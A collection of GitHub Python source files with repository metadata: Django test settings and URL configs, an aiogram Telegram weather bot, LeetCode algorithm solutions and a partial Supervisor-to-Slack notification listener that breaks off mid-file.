'doj.tests.db',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'doj.tests.urls'\n\nWSGI_APPLICATION = 'doj.tests.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/dev/ref/settings/#databases\n\nTEST_DATABASES = {\n 'sqlite': {\n 'ENGINE': 'doj.db.backends.sqlite',\n 'NAME': os.path.join(BASE_DIR, 'doj.sqlite3'),\n 'TEST': {\n 'NAME': os.path.join(BASE_DIR, 'doj-tests.sqlite3'),\n }\n },\n 'postgresql': {\n 'ENGINE': 'doj.db.backends.postgresql',\n 'NAME': 'doj',\n 'HOST': 'localhost',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'TEST': {\n 'NAME': 'doj-tests',\n }\n },\n 'mysql': {\n 'ENGINE': 'doj.db.backends.mysql',\n 'NAME': 'doj',\n 'HOST': 'localhost',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'TEST': {\n 'NAME': 'doj-tests',\n }\n },\n 'mssql': {\n 'ENGINE': 'doj.db.backends.mssql',\n 'NAME': 'doj',\n 'HOST': 'localhost',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'TEST': {\n 'NAME': 'doj-tests',\n }\n },\n}\n\nDATABASES = {\n 'default': TEST_DATABASES['sqlite'],\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/dev/topics/i18n/\n\nLANGUAGE_CODE = 'en-gb'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/dev/howto/static-files/\n\nSTATIC_URL = '/static/'\n","repo_name":"beachmachine/django-jython","sub_path":"doj/tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"3246681174","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import *\n\nimport views\nimport api_views\nimport datasource_api_views\n\nimport viper_api_views\nimport viper_views\nimport jqm_views\nimport jqm_api_views\n\nurlpatterns = patterns('',\n\t#workspace\n\t#(r'^$', views.show_workspaces),\n\t#(r'^workspace/create/$', views.create_workspace),\n\t#(r'^workspace/delete/(\\d+)/$', views.delete_workspace),\n\t#project\n\t(r'^projects/$', views.show_projects),\n\t(r'^project/edit/(\\d+)/$', views.show_workbench),\n\t(r'^project/copy/(\\d+)/$', views.copy_project),\n\t(r'^project/export/$', views.export_project),\n\t(r'^project/import/$', views.import_project),\n\t(r'^project/create/$', views.create_project),\n\t(r'^project/delete/(\\d+)/$', views.delete_project),\n\t#(r'^jqm/(\\d+)/$', views.show_mobile_page),\n\t(r'^preview/(\\d+)/(\\d+)/$', views.preview_page),\n\t(r'^preview/(\\d+)/$', views.preview_page, {'page_id': None}),\n\n\t(r'^jqm_design_page/get/$', jqm_views.show_design_page),\n\t(r'^jqm/preview/$', jqm_views.show_preview_page),\n\t(r'^jqm/view_production/$', jqm_views.show_production_page),\n\t(r'^api/jqm_design_page/create/$', jqm_api_views.create_page),\n\n\t#viper design\n\t(r'^viper_design_page/get/$', viper_views.show_viper_design_page),\n\t(r'^viper_production_page/get/$', viper_views.show_viper_production_page),\n\t#(r'^viper_page/get/$', views.show_viper_page),\n\t#(r'^viper_list_page/get/$', views.show_viper_list_page),\n\t(r'^viper/preview/$', viper_views.show_viper_production_page),\n\t(r'^viper/page/$', viper_views.show_free_page),\n\t# (r'^viper/records/$', viper_views.list_records),\n\t(r'^viper/record/create/$', viper_views.create_record),\n\t(r'^viper/record/update/$', viper_views.update_record),\n\t(r'^viper/record/delete/$', viper_views.delete_record),\n\t(r'^viper/api/record_display_index/update/$', viper_api_views.update_record_display_index),\n\t(r'^viper/api/records/get/$', viper_api_views.get_records),\n\t(r'^api/viper_design_page/create/$', viper_api_views.create_page),\n\t(r'^api/viper_design_page_by_id/create/$', viper_api_views.create_page_by_id),\n\n\n\t#workspace api\n\t(r'^api/workspace_name/update/$', api_views.update_workspace_name),\n\t#page template api\n\t(r'^api/page_template/create/$', api_views.create_page_template),\n\t(r'^api/page_templates/get/$', api_views.get_page_templates),\n\t#datasource api\n\t(r'^api/datasource_project_pages/get/$', datasource_api_views.get_datasource_project_pages),\n\t#project api\n\t(r'^api/project_name/update/$', api_views.update_project_name),\n\t(r'^api/images/get/$', api_views.get_project_images),\n\t(r'^api/image/delete/$', api_views.delete_project_image),\n\t(r'^api/nav_icons/get/$', api_views.get_project_nav_icons),\n\t#page api\n\t(r'^api/page/synchronize/$', api_views.synchronize_page),\n\t(r'^api/page/delete/$', api_views.delete_page),\n\t(r'^api/page_index/update/$', api_views.update_page_display_index),\n\t#(r'^api/pages/create/$', api_views.create_pages),\n\t#(r'^api/mobile_page/create/$', api_views.create_mobile_page),\n\t#(r'^api/viper_result/preview/$', api_views.preview_viper_result),\n\t(r'^api/pages_json/get/$', api_views.get_pages_json),\n\t#css api\n\t(r'^api/css/get/$', api_views.get_css),\n\t(r'^api/css/update/$', api_views.update_css),\n\t(r'^api/apis_content/get/$', api_views.get_apis_content),\n\t(r'^api/apis_content/update/$', api_views.update_apis_content),\n\t#records api\n\t#project data api's api\n\t#(r'^api/project_datasource_api/call/$', api_views.call_project_datasource_api),\n)","repo_name":"chengdg/weizoom","sub_path":"weapp/termite/workbench/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29109804537","text":"import aioredis\r\n\r\nfrom aiogram import Bot, Dispatcher\r\nfrom aiogram.types import Message, CallbackQuery\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\r\nfrom aiogram.dispatcher.filters import Text\r\nfrom aiogram.dispatcher import FSMContext\r\n\r\nfrom typing import Any, Coroutine, Union\r\n\r\nfrom .variables import (\r\n TG_TOKEN,\r\n REDIS_HOST,\r\n WELCOME_MESSAGE\r\n)\r\nfrom .keyboards import start_keyboard, get_weeather_keyboard\r\nfrom .weather_worker import get_current_weather, get_day_weather, get_weather_by_coords\r\n\r\nbot = Bot(token=TG_TOKEN)\r\ndp = Dispatcher(bot, storage=MemoryStorage())\r\nstorage = MemoryStorage()\r\n\r\nredis = aioredis.from_url(REDIS_HOST)\r\n\r\n\r\nclass Form(StatesGroup):\r\n city = State()\r\n\r\n\r\nasync def start_input(message_object: Union[Message, CallbackQuery]) -> None:\r\n await Form.city.set()\r\n await message_object.reply(\"Введите название города\")\r\n\r\n\r\nasync def send_weather(message_object: Union[Message, CallbackQuery], weather_worker: Coroutine[Any, Any, str]) -> None:\r\n user_city_bytes = await redis.execute_command(\"get\", message_object.from_user.id)\r\n if user_city_bytes is not None:\r\n user_city = user_city_bytes.decode()\r\n weather = await weather_worker(user_city)\r\n await bot.send_message(\r\n message_object.from_user.id,\r\n weather,\r\n )\r\n return\r\n\r\n await start_input(message_object)\r\n\r\n\r\n@dp.message_handler(state='*', commands='cancel')\r\n@dp.message_handler(Text(equals='отмена', ignore_case=True), state='*')\r\nasync def cancel_handler(message: Message, state: FSMContext):\r\n current_state = await state.get_state()\r\n if current_state is None:\r\n return\r\n\r\n await state.finish()\r\n await message.reply('Отмена ввода города')\r\n\r\n\r\n@dp.message_handler(commands=[\"start\"])\r\nasync def send_welcome(message: Message):\r\n await message.answer(\r\n WELCOME_MESSAGE,\r\n reply_markup=start_keyboard\r\n )\r\n\r\n\r\n@dp.callback_query_handler(text=\"get_weather\")\r\n@dp.message_handler(Text(equals=\"🔅 Узнать погоду\", ignore_case=True))\r\nasync def get_weather(callback_query: CallbackQuery):\r\n await send_weather(callback_query, get_current_weather)\r\n\r\n\r\n@dp.message_handler(Text(equals=\"📕 Погода на день\", ignore_case=True))\r\nasync def get_weather(callback_query: CallbackQuery):\r\n await send_weather(callback_query, get_day_weather)\r\n\r\n\r\n@dp.message_handler(commands=[\"change_city\"])\r\n@dp.message_handler(Text(equals=\"🔃 Другой город\", ignore_case=True))\r\nasync def change_city(message: Message):\r\n await start_input(message)\r\n\r\n\r\n@dp.message_handler(state=Form.city)\r\nasync def process_city(message: Message, state: FSMContext):\r\n await redis.execute_command(\"set\", message.from_user.id, message.text)\r\n\r\n await message.reply(\r\n f\"Твой город: {message.text}\",\r\n reply_markup=get_weeather_keyboard\r\n )\r\n\r\n await state.finish()\r\n\r\n\r\n@dp.message_handler(content_types=['location'])\r\nasync def get_location(message: Message):\r\n weather = await get_weather_by_coords(message.location.latitude, message.location.longitude)\r\n await message.reply(\r\n weather,\r\n reply_markup=get_weeather_keyboard\r\n )\r\n","repo_name":"eshumakova/wz_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40039662080","text":"## Importing path, to handle view-url association.\n# Also, importing all blog's views\n\nfrom django.urls import path\nfrom .views import (\n PostListView, \n PostDetailView, \n PostCreateView,\n PostUpdateView,\n PostDeleteView,\n UserPostListView,\n about\n)\n\n\n## All these paths have the root of /blog, as defined on /WebApp/urls.py\n# Observe <int:pk>, for injection filtering\nurlpatterns=[\n path('', PostListView.as_view(), name='blog-home'),\n path('user/<str:username>', UserPostListView.as_view(), name='user-posts'),\n path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),\n path('post/new/', PostCreateView.as_view(), name='post-create'),\n path('post/<int:pk>/update', PostUpdateView.as_view(), name='post-update'),\n path('post/<int:pk>/delete', PostDeleteView.as_view(), name='post-delete'),\n path('about', about, name='blog-about'),\n]\n","repo_name":"caiofook/WebApp","sub_path":"WebApp/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73374531752","text":"######################################################################\n# Key point is the median of two \n# SORTED lists DIVIDES the total \n# of two lists into two equal length parts\n# one part always is less than the other part\n# https://leetcode.com/problems/median-of-two-sorted-arrays/solution/\n######################################################################\n\ndef median_of_two_sorted_arrs(A,B):\n m,n = len(A),len(B)\n # always fix on a larger arr size, n > m\n if m > n:\n A,B,m,n = B,A,n,m\n \n # edge case:\n if n == 0:\n raise ValueError\n \n # define range of index i, \n # i traverses m, the smaller length\n imin,imax,half_len = 0,m,(m+n+1)/2\n \n # start a binary search in the range [imin,imax]\n # we are trying to search the proper index i\n # that will divides the lists \n # in this binary search, the return condition \n # is the median condition,\n # when we need to search for a larger or smaller i,\n # we adjust the range, much like binary search\n while imin <= imax:\n i = int((imin+imax)/2)\n j = int(half_len - i )\n \n # by setting j = halflen - i, we make \n # sure left and right parts are the same length\n \n # case 1, B[j-1]<=A[i] && A[i-1]<=B[j]\n # since A, B are already sorted (i.e A[i-1]<=A[i]\n # and B[j-1]<=B[j]), this meresult\n # we've found the median\n if B[j-1] <= A[i] and A[i-1]<= B[j]:\n if i == 0:\n max_of_left = B[j-1]\n elif j == 0:\n max_of_left = A[i-1]\n else:\n max_of_left = max(A[i-1],B[j-1])\n \n if i == m: \n min_of_right = B[j]\n elif j == n:\n min_of_right = A[i]\n else:\n min_of_right = min(A[i],B[j])\n \n if (m+n)%2 == 1:\n return max_of_left\n else:\n return (max_of_left+min_of_right)/2\n elif B[j-1] > A[i]:\n # i and j go in reverse direction\n # we want A to be larger, and B to be\n # smaller\n # to do this, we can only increment i\n # which decrements j\n imin = i+1\n \n elif A[i-1] > B[j]:\n imax = i - 1\n##########################################################\n# since the problem is super open ended\n# there are wayyyyy to many edge cases\n# first attempt would be to use a finite\n# state machine to solve this\n# https://leetcode.com/problems/valid-number/discuss/23728\\\n#/A-simple-solution-in-Python-based-on-DFA\n###########################################################\ndef valid_number(s):\n # define states\n # list of states\n # index stands for state\n # state[0] is state q0\n \n state = [{},\\\n {'blank':1,'sign':2,'digit':3,'dot':4},\\\n {'digit':3,'dot':4},\\\n {'digit':3,'e':6,'dot':5,'blank':9},\\\n {'digit':5},\\\n {'digit':5, 'e':6, 'blank':9},\\\n {'sign':7, 'digit':8},\\\n {'digit':8},\\\n {'digit':8, 'blank':9},\\\n {'blank':9}]\n curS = 1 \n for c in s: \n if c >= '0' and c <='9':\n c = 'digit'\n if c == ' ':\n c = 'blank'\n if c in ['+','-']:\n c = 'sign'\n if c not in state[curS].keys():\n return False\n nxtS = state[curS][c]\n curS = nxtS\n if curS not in [3,5,8,9]:\n return False\n return True\n\n\n# the idea is to loop through\n# every pt, and construct a line \n# with every other pt'. Record\n# the slopes as a dictionary, with \n# slope as key. Note, this dictionary is \n# only for this particular pt. Meaning,\n# how many other points share the same slope\n# as well as being through pt.\ndef max_pts_on_a_line(points):\n # need to define helper funcs \n # to avoid floating pt precision problem\n \n # use greatest common divisor and fraction\n # to express floating point in terms of \n # rationals (i.e integer division)\n # gcd here assures 4/8 actually is 1/2, \n # this will make sure the dictionary of \n # slopes don't duplicate/explode unnecessarily\n def gcd(a,b):\n if b == 0:\n return a\n return gcd(b,a%b)\n def frac(x,y):\n g = gcd(x,y)\n return (x//g, y//g)\n \n l = len(points)\n m = 0 \n for i in range(l):\n ptdict = {'inf':1} # infinite slope \n same = 0 \n ix = points[i].x\n iy = points[i].y\n # other points\n for j in range(i+1,l):\n jx = points[j].x\n jy = points[j].y\n if ix == jx and iy == jy:\n same += 1\n continue\n if ix == jx: # on the same verticle line, infinite slope\n slope = 'inf'\n else:\n slope = frac(jy-iy,jx-ix)\n \n if slope not in ptdict.keys():\n ptdict[slope] = 1 \n ptdict[slope]+= 1\n \n print(ptdict)\n m = max(m,max(ptdict.values())+same)\n return m\n\n# word Ladder II\n# for this one, we basically build the BFS tree\n# level by level with words in the wordList\n# and with a smart list comprehension trick, we \n# will get the final resultwer\ndef word_ladder_ii(beginWord,endWord,wordList):\n import collections\n import string\n # use collections defaultdict allows us to keep track of \n # tree structure, at the same time add path\n # info to nodes of interest\n if beginWord not in wordList:\n wordList+=beginWord\n if endWord not in wordList:\n wordList+=endWord\n\n thislevel = {beginWord}\n parents = collections.defaultdict(set)\n\n while thislevel and endWord not in parents:\n nextlevel = collections.defaultdict(set)\n for node in thislevel:\n for char in string.ascii_lowercase:\n for i in range(len(beginWord)):\n n = node[:i]+char+node[i+1:]\n if n in wordList and n not in parents:\n nextlevel[n].add(node) # adding node while exploring \n # tree allows us to build the \n # path back up\n thislevel = nextlevel\n parents.update(nextlevel)\n result = [[endWord]]\n while result and result[0][0] != beginWord:\n result = [[p]+r for r in result for p in parents[result[0][0]]]\n return result\n\n\"\"\"\nwe can rephrase this as a problem about\nthe prefix sums of A. \nLet P[i] = sum(A[i]) for i = 0...i-1\nWe want the smallest j - i such that\nj > i and \nP[j] - P[i] >= K\n\"\"\"\n \ndef shortest_subarray(A,k):\n import collections\n N = len(A)\n B = [0] * (N+1)\n \n # assemble cumulative sum arr B; O(N)\n for i in range (N): B[i+1] = B[i] + A[i]\n \n # initialize deque d, to keep track\n # of \n d = collections.deque()\n res = N + 1 \n \n # loop through every ending position of B\n # i.e loop through every j \n for i in xrange(N+1):\n # continuously find shorter (popleft)\n # and shorter subarrs , i.e, \n # index i, \n # that satisfies the \n # K condition\n while d and B[i] - B[d[0]] >= k:\n subarr_len = i - d.popleft()\n res = min(res, subarr_len)\n \n # while loop to make sure \n # the d-deque actually contains\n # indices that are increasing\n # B's value\n while d and B[i] - B[d[-1]] <= 0:\n d.pop()\n d.append(i)\n return res if res <= N else -1 \n\n##############################\n## text justification\n##############################\ndef text_justification(words,maxWidth):\n res,cur,num_of_letters = [],[],0\n\n for w in words:\n # there is need for rearrangement\n if num_of_letters + len(w) + len(cur) > maxWidth:\n for i in range(maxWidth - num_of_letters):\n cur[i%(len(cur) -1 or 1)]+= ' '\n res.append(''.join(cur))\n cur,num_of_letters = [],0\n cur +=[w]\n num_of_letters += len(w)\n return res+ [' '.join(cur).ljust(maxWidth)]\n\n# don't use brute force O(N^2)\n# use merge sort\nclass reversePairsSolution(object):\n def __init__(self):\n self.cnt = 0 \n def reversePairs(self,nums):\n def msort(lst):\n # merge sort body \n L = len(lst)\n if L < 1:\n return lst \n else:\n return merge(msort(lst[:int(L/2)]),msort(lst[int(L/2):]))\n # in this method, we are NOT really\n # sorting things, but rather\n # in the if and else block\n # we are summing how many times left is \n # more than 2 times larger than right, i.e a valid SWAP\n # but in the end, the merge function still has to return \n # the proper sorted list though\n def merge(left,right):\n l,r = 0,0\n while l <(len(left)) and r < len(right):\n if left[l] <= 2 * right[r]:\n l += 1\n else:\n self.cnt +=1\n r += 1\n return sorted(left+right)\n \n msort(nums)\n return self.cnt\n\ndef wildcard_matching(s,p):\n \n # main DP recursion\n # i indicates s\n # j indicates p\n # T[i][j] = (T[i-1][j] or T[i][j-1]) if p[j-1] == '*'\n # = T[i-1][j-1] if (p[j-1] == '?' or p[j-1] == s[i-1])\n # = False\n # where T[i][j] is the subproblem of \n # True of False, s[:i-1] and p[:j-1] is a vliade\n # wildcard matching\n T = [[None for _ in range(len(p)+1)] for _ in range(len(s)+1)]\n T[0][0] = True\n # base case for T[0]\n for i in range(1,len(p)+1):\n if p[i-1] == '*':\n T[0][i] = T[0][i-1]\n else:\n T[0][i] = False\n # base case for T[:][0]\n for i in range(1,len(s)+1):\n T[i][0] = False\n \n # main recursion\n for i in range(1,len(s)+1):\n for j in range(1,len(p)+1):\n if p[j-1] == '?' or p[j-1] == s[i-1]:\n T[i][j] = T[i-1][j-1]\n elif p[j-1] == '*':\n T[i][j] = (T[i-1][j]) or (T[i][j-1])\n else:\n T[i][j] = False\n \n \n return T[len(s)][len(p)]\n\n# Key observation:\n# avg of two lists is also the avg of A \n#\ndef split_arr_with_same_avg(A):\n from fractions import Fraction\n N = len(A)\n S = sum(A)\n A = [z - Fraction(S,N) for z in A]\n if N == 1:return False\n \n left = {A[0]} # all powersets of first Half of A\n # if left sums to zero then True\n # if any powerset of left plus a \n # powerset of right is zero, then True \n right = {A[-1]}\n for i in range(1,int(N/2)):\n left = {z + A[i] for z in left}|left|{A[i]} # adding powersets\n # always keep a set to be sum of all current left elements\n # then or it with current left\n # and or it with new A[i] element\n print(left)\n if 0 in left: return True\n for i in range(int(N/2),N-1):\n right = {z + A[i] for z in right} | right | {A[i]}\n \n if 0 in right: return True\n \n sleft = sum(A[i] for i in range(int(N/2)))\n sright = sum(A[i] for i in range(int(N/2),N))\n \n return any(-ha in right and (ha, -ha) != (sleft, sright) for ha in left)\n\n# The key to this problem is to \n# always choose the smallest next cell to go, among\n# all possible adjacent cells\n# we make sure to use 'seen' set \n# so that we will always keep the heap\n# as the container for candidate cells\ndef swim_in_water(grid):\n import heapq\n # initalize size, heap, set of visited nodes, res\n N, pq, seen, res = len(grid),[(grid[0][0],0,0)],set([(0,0)]),0\n while True:\n T,x,y = heapq.heappop(pq)\n res = max(res,T)\n if x == y == N-1:\n return res\n for i,j in [(x+1,y),(x,y+1),(x-1,y),(x,y-1)]:\n if (i,j) not in seen:\n if 0 <= i < N and 0<=j < N:\n heapq.heappush(pq,(grid[i][j],i,j))\n seen.add((i,j))\n\n# This question was briefly mentioned in \n# cracking the coding interview book \n# early pages\n# heaps always keeps mins of a bigger half\n# and a smaller half\n# therefore the median would be either one or avg\n# the min-heap keeps the larger half of numbers\n# the max-heap (implemented as - of minheap) keeps the \n# smaller half of the numbers\n# then, intuitively, the root of max-heap, is the max of \n# small numbers\n# root of the min-heap, is the min\n# of large numbers\n# as long as two heaps are close to the same size\n# we can get median all we want\nclass MedianFinder(object):\n import heapq\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.small = [] # this keep large numbers\n self.large = [] # this keep very small numbers \n\n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: void\n \"\"\"\n # adding new number to two heaps\n # making sure we are balancing among the small and\n # large heaps\n heapq.heappush(self.small,-heapq.heappushpop(self.large,num))\n \n # balance two lengths\n if len(self.large) < len(self.small):\n heapq.heappush(self.large,-heapq.heappop(self.small))\n \n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n # median should be in the larger lump \n if len(self.large) > len(self.small):\n return float(self.large[0])\n return (self.large[0] - self.small[0])/2.0\n \n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\n\ndef min_refuel_stops(target,startFuel,stations):\n import heapq\n past_stations = [] # this will be a max_heap\n stations.append((target,float('inf')))\n \n incremental_miles = 0\n res = 0 \n fuelLeft = startFuel\n \n for locale,fuelamount in stations:\n # at every new station\n # first update fuel left\n fuelLeft -= locale - incremental_miles\n\n # check if we succeeded\n if fuelLeft >=0 and incremental_miles == target:\n return res\n # if we ran out of fuel\n # we can 'regret' and refuel at previous most \n # capacious gas station till we are full\n # note, we are not going back in time\n # we are still at the current location, station. \n # we are just regretting previous mishaps\n while fuelLeft < 0 and past_stations:\n fuelLeft += -heapq.heappop(past_stations)\n res +=1\n # if there is no possible way we can refuel \n # back, we decalre failure\n if fuelLeft < 0:return -1\n \n # in the end, if everything above executes fine\n # and we are still in the game\n # let's add this station to the heap,\n # for now, we are not refueling at this station,\n # but how knows, we may regret later and pop it off\n # the heap\n heapq.heappush(past_stations,-fuelamount)\n \n # update our incremental miles\n incremental_miles = locale\n return res\n\n# Algo:\n# Compare the heads of every list, pick the smallest one to \n# the new list. \n# Do this with priority queue (implemented with heap underneath)\n# overall runtime would be O(NlogK)\ndef merge_k_sorted_linkedlists(lists):\n from Queue import PriorityQueue\n newhead = ListNode(0)\n current = newhead\n q = PriorityQueue()\n\n # putting the headnodes of each list\n # to the q is the same as putting \n # the whole list there, because we are \n # dealing with LINKED list here. \n for headnode in lists:\n if headnode:q.put((headnode.val,headnode))\n while q.qsize()>0:\n current.next = q.get()[1] # index [1] to get the actual node\n current = current.next # move the new position in the new list\n # while we are at it,\n # we put the current's next node to q\n if current.next:\n q.put((current.next.val,current.next))\n return newhead.next\n\n# Algo:\n# nearest palindrome\ndef nearestPalindromic( S):\n \"\"\"\n :type n: str\n :rtype: str\n \"\"\"\n def palindsize(x):\n return abs(int(S) - int(x))\n \n L = len(S)\n #Start with basic candidates, \n # ones which start with 10..., cause those ones\n # could potentially be the most minimizing ones\n # covering edgecases like 100, which should be 99 instead of 101\n cands = [str(10**l+tiny_delta) for l in (L-1,L) for tiny_delta in (-1,1)] \n prefix = S[:(L+1)/2] \n P = int(prefix)\n \n # now, for the first part, +/- one of the middle or middle parity\n for firstpart in (P-1, P, P+1):\n firstpart = str(firstpart)\n secondpart = firstpart[:-1] if L%2 else firstpart\n cands.append(firstpart + secondpart[::-1])\n\n result = None\n for cand in cands:\n if cand != S and not cand.startswith('00'):\n # if result is still null, take the cand for now\n # or if candidate is a smaller palindrome, take it. \n if (result is None or palindsize(cand) < palindsize(result)):\n result = cand\n # if current cand palind size is the same with previous result\n # AND the absolute value of cand is smaller, take the cand\n elif palindsize(cand) == palindsize(result) and int(cand) < int(result):\n result = cand\n return result\n\n\n","repo_name":"tianchuliang/leetcode","sub_path":"oldcode/H_algo.py","file_name":"H_algo.py","file_ext":"py","file_size_in_byte":17602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28619245557","text":"#\n# @lc app=leetcode id=14 lang=python3\n#\n# [14] Longest Common Prefix\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n l = list(zip(*strs))\n prefix = \"\"\n for i in l:\n if len(set(i))==1:\n prefix += i[0]\n else:\n break\n return prefix\n # print('hello')\n \n# @lc code=end\ns = Solution()\nstrs = [\"flower\", \"flow\", \"flight\"]\nres = s.longestCommonPrefix(strs)\nprint(res)\n","repo_name":"Anderbone/leetcode","sub_path":"Python/14.longest-common-prefix.py","file_name":"14.longest-common-prefix.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34332046977","text":"import copy\nimport os\nimport sys\nimport json\n\nfrom slack import WebClient, WebhookClient\nfrom superlance.process_state_monitor import ProcessStateMonitor\nfrom supervisor import childutils\n\n\nclass SuperSlacker(ProcessStateMonitor):\n SUPERVISOR_EVENTS = (\n 'STARTING', 'RUNNING', 'BACKOFF', 'STOPPING',\n 'FATAL', 'EXITED', 'STOPPED', 'UNKNOWN',\n )\n\n EVENTS_SLACK_COLORS = {\n \"PROCESS_STATE_STOPPED\": ':apple:',\n \"PROCESS_STATE_STARTING\": ':warning:',\n \"PROCESS_STATE_RUNNING\": ':green_apple:',\n \"PROCESS_STATE_BACKOFF\": ':apple:',\n \"PROCESS_STATE_STOPPING\": ':apple:',\n \"PROCESS_STATE_EXITED\": ':apple:',\n \"PROCESS_STATE_FATAL\": ':apple:',\n \"PROCESS_STATE_UNKNOWN\": ':apple:',\n }\n\n EVENTS_SHORT_NAMES = {\n \"PROCESS_STATE_STOPPED\": 'STOPPED',\n \"PROCESS_STATE_STARTING\": 'STARTING',\n \"PROCESS_STATE_RUNNING\": 'RUNNING',\n \"PROCESS_STATE_BACKOFF\": 'BACKOFF',\n \"PROCESS_STATE_STOPPING\": 'STOPPING',\n \"PROCESS_STATE_EXITED\": 'EXITED',\n \"PROCESS_STATE_FATAL\": 'FATAL',\n \"PROCESS_STATE_UNKNOWN\": 'UNKNOWN',\n }\n\n @classmethod\n def _get_opt_parser(cls):\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-t\", \"--token\", help=\"Slack Token\")\n parser.add_option(\"-c\", \"--channel\", help=\"Slack Channel\")\n parser.add_option(\"-w\", \"--webhook\", help=\"Slack WebHook URL\")\n parser.add_option(\"-i\", \"--icon\", default=':sos:',\n help=\"Slack emoji to be used as icon\")\n parser.add_option(\"-u\", \"--username\",\n default='superslacker', help=\"Slack username\")\n parser.add_option(\"-n\", \"--hostname\", help=\"System Hostname\")\n parser.add_option(\"-p\", \"--proxy\", help=\"Proxy server\")\n parser.add_option(\n \"--eventname\", default=\"TICK_60\", help=\"TICK_5 or TICK_60. Default TICK_60. How often to add messages into queue\")\n parser.add_option(\n \"--interval\", default=60, help=\"How often to flush message queue. Default 60sec\")\n parser.add_option(\n \"-e\", \"--events\", help=\"Supervisor event(s). Can be any, some or all of {} as comma separated values\".format(cls.SUPERVISOR_EVENTS))\n parser.add_option(\n \"--blacklist\", help=\"Comma-separated list of application for which not to send notifiactions\")\n parser.add_option(\n \"--whitelist\", help=\"Comma-separated list of application always to monitor\")\n\n return parser\n\n @classmethod\n def parse_cmd_line_options(cls):\n parser = cls._get_opt_parser()\n (options, args) = parser.parse_args()\n return options\n\n @classmethod\n def validate_cmd_line_options(cls, options):\n parser = cls._get_opt_parser()\n if not options.token and not options.webhook:\n parser.print_help()\n sys.exit(1)\n if options.token and options.webhook:\n parser.print_help()\n sys.exit(1)\n if not options.channel:\n parser.print_help()\n sys.exit(1)\n if not options.hostname:\n import socket\n options.hostname = socket.gethostname()\n\n validated = copy.copy(options)\n return validated\n\n @classmethod\n def get_cmd_line_options(cls):\n return cls.validate_cmd_line_options(cls.parse_cmd_line_options())\n\n @classmethod\n def create_from_cmd_line(cls):\n options = cls.get_cmd_line_options()\n\n if 'SUPERVISOR_SERVER_URL' not in os.environ:\n sys.stderr.write('Must run as a supervisor event listener\\n')\n sys.exit(1)\n\n return cls(**options.__dict__)\n\n def __init__(self, **kwargs):\n ProcessStateMonitor.__init__(self, **kwargs)\n self.channel = kwargs['channel']\n self.token = kwargs.get('token', None)\n self.now = kwargs.get('now', None)\n self.hostname = kwargs.get('hostname', None)\n self.webhook = kwargs.get('webhook', None)\n self.proxy = kwargs.get('proxy', None)\n self.icon = kwargs.get('icon')\n self.username = kwargs.get('username')\n self.eventname = kwargs.get('eventname', \"TICK_5\")\n self.interval = float(kwargs.get('interval', 60))/60\n self.process_state_events = ['PROCESS_STATE_{}'.format(status)\n for status in self.SUPERVISOR_EVENTS]\n\n if kwargs.get('events'):\n self.process_filter_events = [\n 'PROCESS_STATE_{}'.format(e.strip().upper())\n for e in kwargs.get('events', None).split(\",\")\n if e in self.SUPERVISOR_EVENTS\n ]\n else:\n self.process_filter_events = self.process_state_events\n\n if kwargs.get('blacklist'):\n self.process_blacklist = [\n '{}'.format(e.strip())\n for e in kwargs.get('blacklist', None).split(\",\")\n ]\n else:\n self.process_blacklist = []\n\n if kwargs.get('whitelist'):\n self.process_whitelist = [\n '{}'.format(e.strip())\n for e in kwargs.get('whitelist', None).split(\",\")\n ]\n else:\n self.process_whitelist = []\n\n def get_process_state_change_msg(self, headers, payload):\n pheaders, pdata = childutils.eventdata(payload + '\\n')\n return \"{hostname};{groupname}:{processname};{from_state};{event}\".format(\n hostname=self.hostname, event=headers['eventname'], **pheaders\n )\n\n def send_slack_notification(self, processname, hostname, eventname, from_state):\n payload = {\n 'channel': self.channel,\n 'username': self.username,\n 'icon_emoji': self.icon,\n 'blocks': [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": \"{4} *{0}* @{1}: *{2}* from {3}\".format(processname,\n hostname,\n self.EVENTS_SHORT_NAMES[eventname],\n 